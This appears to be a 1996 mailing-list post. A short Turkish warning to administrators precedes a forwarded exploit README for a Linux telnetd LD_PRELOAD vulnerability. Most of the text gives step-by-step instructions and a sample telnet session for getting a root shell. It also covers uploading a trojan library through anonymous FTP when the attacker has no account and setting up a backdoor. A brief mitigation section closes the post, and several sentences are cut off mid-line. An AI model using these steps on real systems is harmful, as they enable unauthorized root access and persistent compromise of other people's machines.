linux telnetd bug

Gorkem Cetin (
Sat, 24 Aug 1996 20:47:57 +0400 (MEDT)

Asagidaki linux telnetd hatasi linux makinalarin
%90'inda karsida hesap olmasa da root access saglayabiliyor.. SunOS icin
de derlenmis durumda..
Makinalariniz kontrol ediniz..
Iyi calismalar,

Gday. This makefile produces a library, which when specified when initiating
a telnet session allows you to start a root shell when connecting to the

To compile this, type make all. This will compile all the files, produce a
library from the object code and name it XXXXXX.

You then need to open a telnet connection to the machine where this library

-- -- -- -- --

mine% telnet
telnet> env def LD_PRELOAD /tmp/XXXXX
telnet> o
(to) target.machine

Connected to xxxxxxxx.
Escape character is '^]'.

Linux 1.2.13

login: jruser
Squidge - The Guild presents you with a setuid 0 shell

-- -- -- -- --

The library you compiled *must* be on the machine you are trying to
break into. If you have an account, make it there and set the LD_PRELOAD
path to point to it in your homedir. If you have no account, try putting it
in incoming with ftp. The resultant path will be

If you have any problems email me at

At the moment, this only works for ELF machines. Support for a.out
will be added shortly.

Squidge - The Guild


Method One (If you have an account on the machine you want root on. Try this

(1) gunzip and untar the source into a directory, eg /home/squidge/XXXXXX
(2) compile the programs by typing make all
(3) wait
(4) you will have a file /tmp/
(5) type telnet
(6) at the telnet> prompt, type env def LD_PRELOAD /tmp/XXXXX
This tells telnet to pass the environment variable LD_PRELOAD to the
target machine. LD_PRELOAD points to our trojan library.
(7) type open localhost
(8) If you don't get a prompt bash#, but get login: type something like test
You should now be greeted with bash#. Type id and see you are root.
Note that telnetd will time you out, so make some attempt at a backdoor.

Method Two (If you have no account on the target machine)

(1) as above
(2) as above, if you are running the same hardware as the target. If you are
on different processors, try compiling on a different machine. If you
know what you are doing, try changing the target architecture used by
gcc and ld. it is the -m flag with ld.
(3) assuming you have the correct binary, open an ftp connection to the
(4) using bin mode, upload your trojan library to the targets incoming
(5) switch back to your machine, start telnet and specify the path of the
targets ftp directory as your LD_PRELOAD. On linux this is normally
/home/ftp/incoming. On others generally /var/ftp/incoming or
(6) as number 8 above.

If you opt for method 2, you will need a pretty good idea of what is going
on. It is not for the fainthearted. If demand is high, I may release a new
set of .o files for different architectures. There should be no need. I can
compile for Sun(SPARC), M68 and x86 on my linux box. So can you.

There are a few ways. If you have a statically linked login, then you are
safe. setuid programs ignore LD_PRELOAD so one you have logged in, you
cannot subvert the system.

You can patch telnetd to wipe all but a few env variables. There are many
widely pieces of available code to demonstrate this.